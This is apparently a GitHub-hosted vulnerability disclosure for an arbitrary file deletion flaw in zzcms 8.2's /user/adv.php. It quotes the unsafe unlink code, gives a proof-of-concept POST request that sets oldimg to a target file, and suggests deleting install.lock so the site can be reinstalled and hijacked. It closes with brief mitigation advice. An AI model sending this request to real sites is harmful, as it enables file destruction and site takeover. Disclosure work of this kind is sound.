Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
76 lines (41 sloc) 1.21 KB

user/adv.php

##Edition:

zzcms 8.2

/user/adv.php

Code

if ($oldimg<>$img){
		$f="../".$oldimg;
		if (file_exists($f)){
		unlink($f);		
		}
}

Rows: 80

Harm

Allows attackers to delete files arbitrarily

Cause the cause

Through the code can know that we control oldimg.

The statement makes judgments on the account identities. If you want to exploit the vulnerability, the identity should be the company when you register the information.

Create flag.php file in test environment

Then burp grab post request to change oldimg to flag.php

Flag.php file successfully deleted

poc

POST /user/adv.php?action=modify

POST:

adv=123&advlink=%2Fzt%2Fshow.php%3Fid%3D2&company=%E4%BD%A0%E5%A5%BD%E5%95%8A&oldimg=flag.php&img=&Submit22=%E4%BF%AE+%E6%94%B9

An attacker can use this vulnerability to delete any file, such as deleting install.lock for CMS reinstall and hijacking the website database.

Solution

Can be filtered through the input of control parameters, strictly control the type of parameters, suffixes

You can’t perform that action at this time.